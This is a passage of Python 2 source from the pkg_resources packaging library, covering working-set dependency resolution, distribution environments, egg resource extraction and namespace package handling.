"""True if `dist` is the active distribution for its project"""
return self.by_key.get(dist.key) == dist
def find(self, req):
"""Find a distribution matching requirement `req`
If there is an active distribution for the requested project, this
returns it as long as it meets the version requirement specified by
`req`. But, if there is an active distribution for the project and it
does *not* meet the `req` requirement, ``VersionConflict`` is raised.
If there is no active distribution for the requested project, ``None``
is returned.
"""
dist = self.by_key.get(req.key)
if dist is not None and dist not in req:
raise VersionConflict(dist,req) # XXX add more info
else:
return dist
def iter_entry_points(self, group, name=None):
"""Yield entry point objects from `group` matching `name`
If `name` is None, yields all entry points in `group` from all
distributions in the working set, otherwise only ones matching
both `group` and `name` are yielded (in distribution order).
"""
for dist in self:
entries = dist.get_entry_map(group)
if name is None:
for ep in entries.values():
yield ep
elif name in entries:
yield entries[name]
def run_script(self, requires, script_name):
"""Locate distribution for `requires` and run `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
self.require(requires)[0].run_script(script_name, ns)
def __iter__(self):
"""Yield distributions for non-duplicate projects in the working set
The yield order is the order in which the items' path entries were
added to the working set.
"""
seen = {}
for item in self.entries:
for key in self.entry_keys[item]:
if key not in seen:
seen[key]=1
yield self.by_key[key]
def add(self, dist, entry=None, insert=True):
"""Add `dist` to working set, associated with `entry`
If `entry` is unspecified, it defaults to the ``.location`` of `dist`.
On exit from this routine, `entry` is added to the end of the working
set's ``.entries`` (if it wasn't already present).
`dist` is only added to the working set if it's for a project that
doesn't already have a distribution in the set. If it's added, any
callbacks registered with the ``subscribe()`` method will be called.
"""
if insert:
dist.insert_on(self.entries, entry)
if entry is None:
entry = dist.location
keys = self.entry_keys.setdefault(entry,[])
keys2 = self.entry_keys.setdefault(dist.location,[])
if dist.key in self.by_key:
return # ignore hidden distros
self.by_key[dist.key] = dist
if dist.key not in keys:
keys.append(dist.key)
if dist.key not in keys2:
keys2.append(dist.key)
self._added_new(dist)
def resolve(self, requirements, env=None, installer=None, replacement=True):
"""List all distributions needed to (recursively) meet `requirements`
`requirements` must be a sequence of ``Requirement`` objects. `env`,
if supplied, should be an ``Environment`` instance. If
not supplied, it defaults to all distributions available within any
entry or distribution in the working set. `installer`, if supplied,
will be invoked with each requirement that cannot be met by an
already-installed distribution; it should return a ``Distribution`` or
``None``.
"""
requirements = list(requirements)[::-1] # set up the stack
processed = {} # set of processed requirements
best = {} # key -> dist
to_activate = []
while requirements:
req = requirements.pop(0) # process dependencies breadth-first
if _override_setuptools(req) and replacement:
req = Requirement.parse('distribute')
if req in processed:
# Ignore cyclic or redundant dependencies
continue
dist = best.get(req.key)
if dist is None:
# Find the best distribution and add it to the map
dist = self.by_key.get(req.key)
if dist is None:
if env is None:
env = Environment(self.entries)
dist = best[req.key] = env.best_match(req, self, installer)
if dist is None:
#msg = ("The '%s' distribution was not found on this "
# "system, and is required by this application.")
#raise DistributionNotFound(msg % req)
# unfortunately, zc.buildout uses a str(err)
# to get the name of the distribution here..
raise DistributionNotFound(req)
to_activate.append(dist)
if dist not in req:
# Oops, the "best" so far conflicts with a dependency
raise VersionConflict(dist,req) # XXX put more info here
requirements.extend(dist.requires(req.extras)[::-1])
processed[req] = True
return to_activate # return list of distros to activate
def find_plugins(self,
plugin_env, full_env=None, installer=None, fallback=True
):
"""Find all activatable distributions in `plugin_env`
Example usage::
distributions, errors = working_set.find_plugins(
Environment(plugin_dirlist)
)
map(working_set.add, distributions) # add plugins+libs to sys.path
print 'Could not load', errors # display errors
The `plugin_env` should be an ``Environment`` instance that contains
only distributions that are in the project's "plugin directory" or
directories. The `full_env`, if supplied, should be an ``Environment``
contains all currently-available distributions. If `full_env` is not
supplied, one is created automatically from the ``WorkingSet`` this
method is called on, which will typically mean that every directory on
``sys.path`` will be scanned for distributions.
`installer` is a standard installer callback as used by the
``resolve()`` method. The `fallback` flag indicates whether we should
attempt to resolve older versions of a plugin if the newest version
cannot be resolved.
This method returns a 2-tuple: (`distributions`, `error_info`), where
`distributions` is a list of the distributions found in `plugin_env`
that were loadable, along with any other distributions that are needed
to resolve their dependencies. `error_info` is a dictionary mapping
unloadable plugin distributions to an exception instance describing the
error that occurred. Usually this will be a ``DistributionNotFound`` or
``VersionConflict`` instance.
"""
plugin_projects = list(plugin_env)
plugin_projects.sort() # scan project names in alphabetic order
error_info = {}
distributions = {}
if full_env is None:
env = Environment(self.entries)
env += plugin_env
else:
env = full_env + plugin_env
shadow_set = self.__class__([])
map(shadow_set.add, self) # put all our entries in shadow_set
for project_name in plugin_projects:
for dist in plugin_env[project_name]:
req = [dist.as_requirement()]
try:
resolvees = shadow_set.resolve(req, env, installer)
except ResolutionError,v:
error_info[dist] = v # save error info
if fallback:
continue # try the next older version of project
else:
break # give up on this project, keep going
else:
map(shadow_set.add, resolvees)
distributions.update(dict.fromkeys(resolvees))
# success, no need to try any more versions of this project
break
distributions = list(distributions)
distributions.sort()
return distributions, error_info
def require(self, *requirements):
"""Ensure that distributions matching `requirements` are activated
`requirements` must be a string or a (possibly-nested) sequence
thereof, specifying the distributions and versions required. The
return value is a sequence of the distributions that needed to be
activated to fulfill the requirements; all relevant distributions are
included, even if they were already activated in this working set.
"""
needed = self.resolve(parse_requirements(requirements))
for dist in needed:
self.add(dist)
return needed
def subscribe(self, callback):
"""Invoke `callback` for all distributions (including existing ones)"""
if callback in self.callbacks:
return
self.callbacks.append(callback)
for dist in self:
callback(dist)
def _added_new(self, dist):
for callback in self.callbacks:
callback(dist)
class Environment(object):
"""Searchable snapshot of distributions on a search path"""
def __init__(self, search_path=None, platform=get_supported_platform(), python=PY_MAJOR):
"""Snapshot distributions available on a search path
Any distributions found on `search_path` are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used.
`platform` is an optional string specifying the name of the platform
that platform-specific distributions must be compatible with. If
unspecified, it defaults to the current platform. `python` is an
optional string naming the desired version of Python (e.g. ``'2.4'``);
it defaults to the current version.
You may explicitly set `platform` (and/or `python`) to ``None`` if you
wish to map *all* distributions, not just those compatible with the
running platform or Python version.
"""
self._distmap = {}
self._cache = {}
self.platform = platform
self.python = python
self.scan(search_path)
def can_add(self, dist):
"""Is distribution `dist` acceptable for this environment?
The distribution must match the platform and python version
requirements specified when this environment was created, or False
is returned.
"""
return (self.python is None or dist.py_version is None
or dist.py_version==self.python) \
and compatible_platforms(dist.platform,self.platform)
def remove(self, dist):
"""Remove `dist` from the environment"""
self._distmap[dist.key].remove(dist)
def scan(self, search_path=None):
"""Scan `search_path` for distributions usable in this environment
Any distributions found are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used. Only distributions conforming to
the platform/python version defined at initialization are added.
"""
if search_path is None:
search_path = sys.path
for item in search_path:
for dist in find_distributions(item):
self.add(dist)
def __getitem__(self,project_name):
"""Return a newest-to-oldest list of distributions for `project_name`
"""
try:
return self._cache[project_name]
except KeyError:
project_name = project_name.lower()
if project_name not in self._distmap:
return []
if project_name not in self._cache:
dists = self._cache[project_name] = self._distmap[project_name]
_sort_dists(dists)
return self._cache[project_name]
def add(self,dist):
"""Add `dist` if we ``can_add()`` it and it isn't already added"""
if self.can_add(dist) and dist.has_version():
dists = self._distmap.setdefault(dist.key,[])
if dist not in dists:
dists.append(dist)
if dist.key in self._cache:
_sort_dists(self._cache[dist.key])
def best_match(self, req, working_set, installer=None):
"""Find distribution best matching `req` and usable on `working_set`
This calls the ``find(req)`` method of the `working_set` to see if a
suitable distribution is already active. (This may raise
``VersionConflict`` if an unsuitable version of the project is already
active in the specified `working_set`.) If a suitable distribution
isn't active, this method returns the newest distribution in the
environment that meets the ``Requirement`` in `req`. If no suitable
distribution is found, and `installer` is supplied, then the result of
calling the environment's ``obtain(req, installer)`` method will be
returned.
"""
dist = working_set.find(req)
if dist is not None:
return dist
for dist in self[req.key]:
if dist in req:
return dist
return self.obtain(req, installer) # try and download/install
def obtain(self, requirement, installer=None):
"""Obtain a distribution matching `requirement` (e.g. via download)
Obtain a distro that matches requirement (e.g. via download). In the
base ``Environment`` class, this routine just returns
``installer(requirement)``, unless `installer` is None, in which case
None is returned instead. This method is a hook that allows subclasses
to attempt other ways of obtaining a distribution before falling back
to the `installer` argument."""
if installer is not None:
return installer(requirement)
def __iter__(self):
"""Yield the unique project names of the available distributions"""
for key in self._distmap.keys():
if self[key]: yield key
def __iadd__(self, other):
"""In-place addition of a distribution or environment"""
if isinstance(other,Distribution):
self.add(other)
elif isinstance(other,Environment):
for project in other:
for dist in other[project]:
self.add(dist)
else:
raise TypeError("Can't add %r to environment" % (other,))
return self
def __add__(self, other):
"""Add an environment or distribution to an environment"""
new = self.__class__([], platform=None, python=None)
for env in self, other:
new += env
return new
AvailableDistributions = Environment # XXX backward compatibility
class ExtractionError(RuntimeError):
"""An error occurred extracting a resource
The following attributes are available from instances of this exception:
manager
The resource manager that raised this exception
cache_path
The base directory for resource extraction
original_error
The exception instance that caused extraction to fail
"""
class ResourceManager:
"""Manage resource extraction and packages"""
extraction_path = None
def __init__(self):
self.cached_files = {}
def resource_exists(self, package_or_requirement, resource_name):
"""Does the named resource exist?"""
return get_provider(package_or_requirement).has_resource(resource_name)
def resource_isdir(self, package_or_requirement, resource_name):
"""Is the named resource an existing directory?"""
return get_provider(package_or_requirement).resource_isdir(
resource_name
)
def resource_filename(self, package_or_requirement, resource_name):
"""Return a true filesystem path for specified resource"""
return get_provider(package_or_requirement).get_resource_filename(
self, resource_name
)
def resource_stream(self, package_or_requirement, resource_name):
"""Return a readable file-like object for specified resource"""
return get_provider(package_or_requirement).get_resource_stream(
self, resource_name
)
def resource_string(self, package_or_requirement, resource_name):
"""Return specified resource as a string"""
return get_provider(package_or_requirement).get_resource_string(
self, resource_name
)
def resource_listdir(self, package_or_requirement, resource_name):
"""List the contents of the named resource directory"""
return get_provider(package_or_requirement).resource_listdir(
resource_name
)
def extraction_error(self):
"""Give an error message for problems extracting file(s)"""
old_exc = sys.exc_info()[1]
cache_path = self.extraction_path or get_default_cache()
err = ExtractionError("""Can't extract file(s) to egg cache
The following error occurred while trying to extract file(s) to the Python egg
cache:
%s
The Python egg cache directory is currently set to:
%s
Perhaps your account does not have write access to this directory? You can
change the cache directory by setting the PYTHON_EGG_CACHE environment
variable to point to an accessible directory.
""" % (old_exc, cache_path)
)
err.manager = self
err.cache_path = cache_path
err.original_error = old_exc
raise err
def get_cache_path(self, archive_name, names=()):
"""Return absolute location in cache for `archive_name` and `names`
The parent directory of the resulting path will be created if it does
not already exist. `archive_name` should be the base filename of the
enclosing egg (which may not be the name of the enclosing zipfile!),
including its ".egg" extension. `names`, if provided, should be a
sequence of path name parts "under" the egg's extraction location.
This method should only be called by resource providers that need to
obtain an extraction location, and only for names they intend to
extract, as it tracks the generated names for possible cleanup later.
"""
extract_path = self.extraction_path or get_default_cache()
target_path = os.path.join(extract_path, archive_name+'-tmp', *names)
try:
_bypass_ensure_directory(target_path)
except:
self.extraction_error()
self.cached_files[target_path] = 1
return target_path
def postprocess(self, tempname, filename):
"""Perform any platform-specific postprocessing of `tempname`
This is where Mac header rewrites should be done; other platforms don't
have anything special they should do.
Resource providers should call this method ONLY after successfully
extracting a compressed resource. They must NOT call it on resources
that are already in the filesystem.
`tempname` is the current (temporary) name of the file, and `filename`
is the name it will be renamed to by the caller after this routine
returns.
"""
if os.name == 'posix':
# Make the resource executable
mode = ((os.stat(tempname).st_mode) | 0555) & 07777
os.chmod(tempname, mode)
def set_extraction_path(self, path):
"""Set the base path where resources will be extracted to, if needed.
If you do not call this routine before any extractions take place, the
path defaults to the return value of ``get_default_cache()``. (Which
is based on the ``PYTHON_EGG_CACHE`` environment variable, with various
platform-specific fallbacks. See that routine's documentation for more
details.)
Resources are extracted to subdirectories of this path based upon
information given by the ``IResourceProvider``. You may set this to a
temporary directory, but then you must call ``cleanup_resources()`` to
delete the extracted files when done. There is no guarantee that
``cleanup_resources()`` will be able to remove all extracted files.
(Note: you may not change the extraction path for a given resource
manager once resources have been extracted, unless you first call
``cleanup_resources()``.)
"""
if self.cached_files:
raise ValueError(
"Can't change extraction path, files already extracted"
)
self.extraction_path = path
def cleanup_resources(self, force=False):
"""
Delete all extracted resource files and directories, returning a list
of the file and directory names that could not be successfully removed.
This function does not have any concurrency protection, so it should
generally only be called when the extraction path is a temporary
directory exclusive to a single process. This method is not
automatically called; you must call it explicitly or register it as an
``atexit`` function if you wish to ensure cleanup of a temporary
directory used for extractions.
"""
# XXX
def get_default_cache():
"""Determine the default cache location
This returns the ``PYTHON_EGG_CACHE`` environment variable, if set.
Otherwise, on Windows, it returns a "Python-Eggs" subdirectory of the
"Application Data" directory. On all other systems, it's "~/.python-eggs".
"""
try:
return os.environ['PYTHON_EGG_CACHE']
except KeyError:
pass
if os.name!='nt':
return os.path.expanduser('~/.python-eggs')
app_data = 'Application Data' # XXX this may be locale-specific!
app_homes = [
(('APPDATA',), None), # best option, should be locale-safe
(('USERPROFILE',), app_data),
(('HOMEDRIVE','HOMEPATH'), app_data),
(('HOMEPATH',), app_data),
(('HOME',), None),
(('WINDIR',), app_data), # 95/98/ME
]
for keys, subdir in app_homes:
dirname = ''
for key in keys:
if key in os.environ:
dirname = os.path.join(dirname, os.environ[key])
else:
break
else:
if subdir:
dirname = os.path.join(dirname,subdir)
return os.path.join(dirname, 'Python-Eggs')
else:
raise RuntimeError(
"Please set the PYTHON_EGG_CACHE enviroment variable"
)
def safe_name(name):
"""Convert an arbitrary string to a standard distribution name
Any runs of non-alphanumeric/. characters are replaced with a single '-'.
"""
return re.sub('[^A-Za-z0-9.]+', '-', name)
def safe_version(version):
"""Convert an arbitrary string to a standard version string
Spaces become dots, and all other non-alphanumeric characters become
dashes, with runs of multiple dashes condensed to a single dash.
"""
version = version.replace(' ','.')
return re.sub('[^A-Za-z0-9.]+', '-', version)
def safe_extra(extra):
"""Convert an arbitrary string to a standard 'extra' name
Any runs of non-alphanumeric characters are replaced with a single '_',
and the result is always lowercased.
"""
return re.sub('[^A-Za-z0-9.]+', '_', extra).lower()
def to_filename(name):
"""Convert a project or version name to its filename-escaped form
Any '-' characters are currently replaced with '_'.
"""
return name.replace('-','_')
class NullProvider:
"""Try to implement resources and metadata for arbitrary PEP 302 loaders"""
egg_name = None
egg_info = None
loader = None
def __init__(self, module):
self.loader = getattr(module, '__loader__', None)
self.module_path = os.path.dirname(getattr(module, '__file__', ''))
def get_resource_filename(self, manager, resource_name):
return self._fn(self.module_path, resource_name)
def get_resource_stream(self, manager, resource_name):
return StringIO(self.get_resource_string(manager, resource_name))
def get_resource_string(self, manager, resource_name):
return self._get(self._fn(self.module_path, resource_name))
def has_resource(self, resource_name):
return self._has(self._fn(self.module_path, resource_name))
def has_metadata(self, name):
return self.egg_info and self._has(self._fn(self.egg_info,name))
if sys.version_info <= (3,):
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info,name))
else:
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info,name)).decode("utf-8")
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
def resource_isdir(self,resource_name):
return self._isdir(self._fn(self.module_path, resource_name))
def metadata_isdir(self,name):
return self.egg_info and self._isdir(self._fn(self.egg_info,name))
def resource_listdir(self,resource_name):
return self._listdir(self._fn(self.module_path,resource_name))
def metadata_listdir(self,name):
if self.egg_info:
return self._listdir(self._fn(self.egg_info,name))
return []
def run_script(self,script_name,namespace):
script = 'scripts/'+script_name
if not self.has_metadata(script):
raise ResolutionError("No script named %r" % script_name)
script_text = self.get_metadata(script).replace('\r\n','\n')
script_text = script_text.replace('\r','\n')
script_filename = self._fn(self.egg_info,script)
namespace['__file__'] = script_filename
if os.path.exists(script_filename):
execfile(script_filename, namespace, namespace)
else:
from linecache import cache
cache[script_filename] = (
len(script_text), 0, script_text.split('\n'), script_filename
)
script_code = compile(script_text,script_filename,'exec')
exec script_code in namespace, namespace
def _has(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _isdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _listdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _fn(self, base, resource_name):
if resource_name:
return os.path.join(base, *resource_name.split('/'))
return base
def _get(self, path):
if hasattr(self.loader, 'get_data'):
return self.loader.get_data(path)
raise NotImplementedError(
"Can't perform this operation for loaders without 'get_data()'"
)
register_loader_type(object, NullProvider)
class EggProvider(NullProvider):
"""Provider based on a virtual filesystem"""
def __init__(self,module):
NullProvider.__init__(self,module)
self._setup_prefix()
def _setup_prefix(self):
# we assume here that our metadata may be nested inside a "basket"
# of multiple eggs; that's why we use module_path instead of .archive
path = self.module_path
old = None
while path!=old:
if path.lower().endswith('.egg'):
self.egg_name = os.path.basename(path)
self.egg_info = os.path.join(path, 'EGG-INFO')
self.egg_root = path
break
old = path
path, base = os.path.split(path)
class DefaultProvider(EggProvider):
"""Provides access to package resources in the filesystem"""
def _has(self, path):
return os.path.exists(path)
def _isdir(self,path):
return os.path.isdir(path)
def _listdir(self,path):
return os.listdir(path)
def get_resource_stream(self, manager, resource_name):
return open(self._fn(self.module_path, resource_name), 'rb')
def _get(self, path):
stream = open(path, 'rb')
try:
return stream.read()
finally:
stream.close()
register_loader_type(type(None), DefaultProvider)
class EmptyProvider(NullProvider):
"""Provider that returns nothing for all requests"""
_isdir = _has = lambda self,path: False
_get = lambda self,path: ''
_listdir = lambda self,path: []
module_path = None
def __init__(self):
pass
empty_provider = EmptyProvider()
class ZipProvider(EggProvider):
"""Resource support for zips and eggs"""
eagers = None
def __init__(self, module):
EggProvider.__init__(self,module)
self.zipinfo = zipimport._zip_directory_cache[self.loader.archive]
self.zip_pre = self.loader.archive+os.sep
def _zipinfo_name(self, fspath):
# Convert a virtual filename (full path to file) into a zipfile subpath
# usable with the zipimport directory cache for our target archive
if fspath.startswith(self.zip_pre):
return fspath[len(self.zip_pre):]
raise AssertionError(
"%s is not a subpath of %s" % (fspath,self.zip_pre)
)
def _parts(self,zip_path):
# Convert a zipfile subpath into an egg-relative path part list
fspath = self.zip_pre+zip_path # pseudo-fs path
if fspath.startswith(self.egg_root+os.sep):
return fspath[len(self.egg_root)+1:].split(os.sep)
raise AssertionError(
"%s is not a subpath of %s" % (fspath,self.egg_root)
)
def get_resource_filename(self, manager, resource_name):
if not self.egg_name:
raise NotImplementedError(
"resource_filename() only supported for .egg, not .zip"
)
# no need to lock for extraction, since we use temp names
zip_path = self._resource_to_zip(resource_name)
eagers = self._get_eager_resources()
if '/'.join(self._parts(zip_path)) in eagers:
for name in eagers:
self._extract_resource(manager, self._eager_to_zip(name))
return self._extract_resource(manager, zip_path)
def _extract_resource(self, manager, zip_path):
if zip_path in self._index():
for name in self._index()[zip_path]:
last = self._extract_resource(
manager, os.path.join(zip_path, name)
)
return os.path.dirname(last) # return the extracted directory name
zip_stat = self.zipinfo[zip_path]
t,d,size = zip_stat[5], zip_stat[6], zip_stat[3]
date_time = (
(d>>9)+1980, (d>>5)&0xF, d&0x1F, # ymd
(t&0xFFFF)>>11, (t>>5)&0x3F, (t&0x1F) * 2, 0, 0, -1 # hms, etc.
)
timestamp = time.mktime(date_time)
try:
if not WRITE_SUPPORT:
raise IOError('"os.rename" and "os.unlink" are not supported '
'on this platform')
real_path = manager.get_cache_path(
self.egg_name, self._parts(zip_path)
)
if os.path.isfile(real_path):
stat = os.stat(real_path)
if stat.st_size==size and stat.st_mtime==timestamp:
# size and stamp match, don't bother extracting
return real_path
outf, tmpnam = _mkstemp(".$extract", dir=os.path.dirname(real_path))
os.write(outf, self.loader.get_data(zip_path))
os.close(outf)
utime(tmpnam, (timestamp,timestamp))
manager.postprocess(tmpnam, real_path)
try:
rename(tmpnam, real_path)
except os.error:
if os.path.isfile(real_path):
stat = os.stat(real_path)
if stat.st_size==size and stat.st_mtime==timestamp:
# size and stamp match, somebody did it just ahead of
# us, so we're done
return real_path
elif os.name=='nt': # Windows, del old file and retry
unlink(real_path)
rename(tmpnam, real_path)
return real_path
raise
except os.error:
manager.extraction_error() # report a user-friendly error
return real_path
def _get_eager_resources(self):
if self.eagers is None:
eagers = []
for name in ('native_libs.txt', 'eager_resources.txt'):
if self.has_metadata(name):
eagers.extend(self.get_metadata_lines(name))
self.eagers = eagers
return self.eagers
def _index(self):
try:
return self._dirindex
except AttributeError:
ind = {}
for path in self.zipinfo:
parts = path.split(os.sep)
while parts:
parent = os.sep.join(parts[:-1])
if parent in ind:
ind[parent].append(parts[-1])
break
else:
ind[parent] = [parts.pop()]
self._dirindex = ind
return ind
def _has(self, fspath):
zip_path = self._zipinfo_name(fspath)
return zip_path in self.zipinfo or zip_path in self._index()
def _isdir(self,fspath):
return self._zipinfo_name(fspath) in self._index()
def _listdir(self,fspath):
return list(self._index().get(self._zipinfo_name(fspath), ()))
def _eager_to_zip(self,resource_name):
return self._zipinfo_name(self._fn(self.egg_root,resource_name))
def _resource_to_zip(self,resource_name):
return self._zipinfo_name(self._fn(self.module_path,resource_name))
register_loader_type(zipimport.zipimporter, ZipProvider)
class FileMetadata(EmptyProvider):
"""Metadata handler for standalone PKG-INFO files
Usage::
metadata = FileMetadata("/path/to/PKG-INFO")
This provider rejects all data and metadata requests except for PKG-INFO,
which is treated as existing, and will be the contents of the file at
the provided location.
"""
def __init__(self,path):
self.path = path
def has_metadata(self,name):
return name=='PKG-INFO'
def get_metadata(self,name):
if name=='PKG-INFO':
f = open(self.path,'rU')
metadata = f.read()
f.close()
return metadata
raise KeyError("No metadata except PKG-INFO is available")
def get_metadata_lines(self,name):
return yield_lines(self.get_metadata(name))
class PathMetadata(DefaultProvider):
"""Metadata provider for egg directories
Usage::
# Development eggs:
egg_info = "/path/to/PackageName.egg-info"
base_dir = os.path.dirname(egg_info)
metadata = PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
dist = Distribution(basedir,project_name=dist_name,metadata=metadata)
# Unpacked egg directories:
egg_path = "/path/to/PackageName-ver-pyver-etc.egg"
metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO'))
dist = Distribution.from_filename(egg_path, metadata=metadata)
"""
def __init__(self, path, egg_info):
self.module_path = path
self.egg_info = egg_info
class EggMetadata(ZipProvider):
"""Metadata provider for .egg files"""
def __init__(self, importer):
"""Create a metadata provider from a zipimporter"""
self.zipinfo = zipimport._zip_directory_cache[importer.archive]
self.zip_pre = importer.archive+os.sep
self.loader = importer
if importer.prefix:
self.module_path = os.path.join(importer.archive, importer.prefix)
else:
self.module_path = importer.archive
self._setup_prefix()
class ImpWrapper:
"""PEP 302 Importer that wraps Python's "normal" import algorithm"""
def __init__(self, path=None):
self.path = path
def find_module(self, fullname, path=None):
subname = fullname.split(".")[-1]
if subname != fullname and self.path is None:
return None
if self.path is None:
path = None
else:
path = [self.path]
try:
file, filename, etc = imp.find_module(subname, path)
except ImportError:
return None
return ImpLoader(file, filename, etc)
class ImpLoader:
"""PEP 302 Loader that wraps Python's "normal" import algorithm"""
def __init__(self, file, filename, etc):
self.file = file
self.filename = filename
self.etc = etc
def load_module(self, fullname):
try:
mod = imp.load_module(fullname, self.file, self.filename, self.etc)
finally:
if self.file: self.file.close()
# Note: we don't set __loader__ because we want the module to look
# normal; i.e. this is just a wrapper for standard import machinery
return mod
def get_importer(path_item):
"""Retrieve a PEP 302 "importer" for the given path item
If there is no importer, this returns a wrapper around the builtin import
machinery. The returned importer is only cached if it was created by a
path hook.
"""
try:
importer = sys.path_importer_cache[path_item]
except KeyError:
for hook in sys.path_hooks:
try:
importer = hook(path_item)
except ImportError:
pass
else:
break
else:
importer = None
sys.path_importer_cache.setdefault(path_item,importer)
if importer is None:
try:
importer = ImpWrapper(path_item)
except ImportError:
pass
return importer
try:
from pkgutil import get_importer, ImpImporter
except ImportError:
pass # Python 2.3 or 2.4, use our own implementation
else:
ImpWrapper = ImpImporter # Python 2.5, use pkgutil's implementation
del ImpLoader, ImpImporter
_distribution_finders = {}
def register_finder(importer_type, distribution_finder):
"""Register `distribution_finder` to find distributions in sys.path items
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `distribution_finder` is a callable that, passed a path
item and the importer instance, yields ``Distribution`` instances found on
that path item. See ``pkg_resources.find_on_path`` for an example."""
_distribution_finders[importer_type] = distribution_finder
def find_distributions(path_item, only=False):
"""Yield distributions accessible via `path_item`"""
importer = get_importer(path_item)
finder = _find_adapter(_distribution_finders, importer)
return finder(importer, path_item, only)
def find_in_zip(importer, path_item, only=False):
metadata = EggMetadata(importer)
if metadata.has_metadata('PKG-INFO'):
yield Distribution.from_filename(path_item, metadata=metadata)
if only:
return # don't yield nested distros
for subitem in metadata.resource_listdir('/'):
if subitem.endswith('.egg'):
subpath = os.path.join(path_item, subitem)
for dist in find_in_zip(zipimport.zipimporter(subpath), subpath):
yield dist
register_finder(zipimport.zipimporter, find_in_zip)
def StringIO(*args, **kw):
"""Thunk to load the real StringIO on demand"""
global StringIO
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
return StringIO(*args,**kw)
def find_nothing(importer, path_item, only=False):
return ()
register_finder(object,find_nothing)
def find_on_path(importer, path_item, only=False):
"""Yield distributions accessible on a sys.path directory"""
path_item = _normalize_cached(path_item)
if os.path.isdir(path_item) and os.access(path_item, os.R_OK):
if path_item.lower().endswith('.egg'):
# unpacked egg
yield Distribution.from_filename(
path_item, metadata=PathMetadata(
path_item, os.path.join(path_item,'EGG-INFO')
)
)
else:
# scan for .egg and .egg-info in directory
for entry in os.listdir(path_item):
lower = entry.lower()
if lower.endswith('.egg-info'):
fullpath = os.path.join(path_item, entry)
if os.path.isdir(fullpath):
# egg-info directory, allow getting metadata
metadata = PathMetadata(path_item, fullpath)
else:
metadata = FileMetadata(fullpath)
yield Distribution.from_location(
path_item,entry,metadata,precedence=DEVELOP_DIST
)
elif not only and lower.endswith('.egg'):
for dist in find_distributions(os.path.join(path_item, entry)):
yield dist
elif not only and lower.endswith('.egg-link'):
for line in open(os.path.join(path_item, entry)):
if not line.strip(): continue
for item in find_distributions(os.path.join(path_item,line.rstrip())):
yield item
break
register_finder(ImpWrapper,find_on_path)
_namespace_handlers = {}
_namespace_packages = {}
def register_namespace_handler(importer_type, namespace_handler):
"""Register `namespace_handler` to declare namespace packages
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `namespace_handler` is a callable like this::
def namespace_handler(importer,path_entry,moduleName,module):
# return a path_entry to use for child packages
Namespace handlers are only called if the importer object has already
agreed that it can handle the relevant path item, and they should only
return a subpath if the module __path__ does not already contain an
equivalent subpath. For an example namespace handler, see
``pkg_resources.file_ns_handler``.
"""
_namespace_handlers[importer_type] = namespace_handler
def _handle_ns(packageName, path_item):
"""Ensure that named package includes a subpath of path_item (if needed)"""
importer = get_importer(path_item)
if importer is None:
return None
loader = importer.find_module(packageName)
if loader is None:
return None
module = sys.modules.get(packageName)
if module is None:
module = sys.modules[packageName] = types.ModuleType(packageName)
module.__path__ = []; _set_parent_ns(packageName)
elif not hasattr(module,'__path__'):
raise TypeError("Not a package:", packageName)
handler = _find_adapter(_namespace_handlers, importer)
subpath = handler(importer,path_item,packageName,module)
if subpath is not None:
path = module.__path__; path.append(subpath)
loader.load_module(packageName); module.__path__ = path
return subpath
def declare_namespace(packageName):
"""Declare that package 'packageName' is a namespace package"""
imp.acquire_lock()
try:
if packageName in _namespace_packages:
return
path, parent = sys.path, None
if '.' in packageName:
parent = '.'.join(packageName.split('.')[:-1])
declare_namespace(parent)
__import__(parent)
try:
path = sys.modules[parent].__path__
except AttributeError:
raise TypeError("Not a package:", parent)
# Track what packages are namespaces, so when new path items are added,
# they can be updated
_namespace_packages.setdefault(parent,[]).append(packageName)
_namespace_packages.setdefault(packageName,[])
for path_item in path:
# Ensure all the parent's path items are reflected in the child,
# if they apply
_handle_ns(packageName, path_item)
finally:
imp.release_lock()
def fixup_namespace_packages(path_item, parent=None):
"""Ensure that previously-declared namespace packages include path_item"""
imp.acquire_lock()
try:
for package in _namespace_packages.get(parent,()):
subpath = _handle_ns(package, path_item)
if subpath: fixup_namespace_packages(subpath,package)
finally:
imp.release_lock()
def file_ns_handler(importer, path_item, packageName, module):
"""Compute an ns-package subpath for a filesystem or zipfile importer"""
subpath = os.path.join(path_item, packageName.split('.')[-1])
normalized = _normalize_cached(subpath)
for item in module.__path__:
if _normalize_cached(item)==normalized:
break
else:
# Only return the path if it's not already there
return subpath
register_namespace_handler(ImpWrapper,file_ns_handler)
register_namespace_handler(zipimport.zipimporter,file_ns_handler)
def null_ns_handler(importer, path_item, packageName, module):
return None
register_namespace_handler(object,null_ns_handler)
def normalize_path(filename):
"""Normalize a file/dir name for comparison purposes"""
return os.path.normcase(os.path.realpath(filename))
def _normalize_cached(filename,_cache={}):
try:
return _cache[filename]
except KeyError:
_cache[filename] = result = normalize_path(filename)
return result
def _set_parent_ns(packageName):
parts = packageName.split('.')
name = parts.pop()
if parts:
parent = '.'.join(parts)
setattr(sys.modules[parent], name, sys.modules[packageName])
def yield_lines(strs):
"""Yield non-empty/non-comment lines of a ``basestring`` or sequence"""
if isinstance(strs,basestring):
for s in strs.splitlines():
s = s.strip()
if s and not s.startswith('#'): # skip blank lines/comments
yield s
else:
for ss in strs:
for s in yield_lines(ss):
yield s
LINE_END = re.compile(r"\s*(#.*)?$").match # whitespace and comment
CONTINUE = re.compile(r"\s*\\\s*(#.*)?$").match # line continuation
DISTRO = re.compile(r"\s*((\w|[-.])+)").match # Distribution or extra
VERSION = re.compile(r"\s*(<=?|>=?|==|!=)\s*((\w|[-.])+)").match # ver. info
COMMA = re.compile(r"\s*,").match # comma between items
